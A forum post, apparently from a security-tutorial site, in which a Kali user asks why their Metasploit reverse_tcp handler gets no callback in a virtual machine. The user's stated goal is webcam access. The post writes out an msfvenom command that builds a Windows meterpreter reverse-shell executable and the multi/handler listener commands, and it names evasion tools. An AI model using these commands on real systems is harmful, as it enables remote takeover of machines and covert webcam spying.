Metasploit reverse_tcp Handler Problem

Oct 29, 2017 07:25 PM
Nov 24, 2017 02:31 PM
636448766588251746.jpg

Hi, I am a Kali Linux user,

and I used metasploit to get access of the webcam.

In the last virtual machine, it worked well, but in this virtual machine, the payload does not execute.

I did :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 -f exe > /root/Desktop/abc.exe

Until now, It successfully worked, but in the metasploit framework console,

use exploit/multi/handler

set LHOST 192.168.xx

set LPORT 4444

exploit -j -z

then it says

Exploit running as background job 0.

Started reverse TCP handler on 192.168.x.x:4444

Then it does nothing.

So I can not even use Veil,TheFatRat,zirikatu now.....

Please Help.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!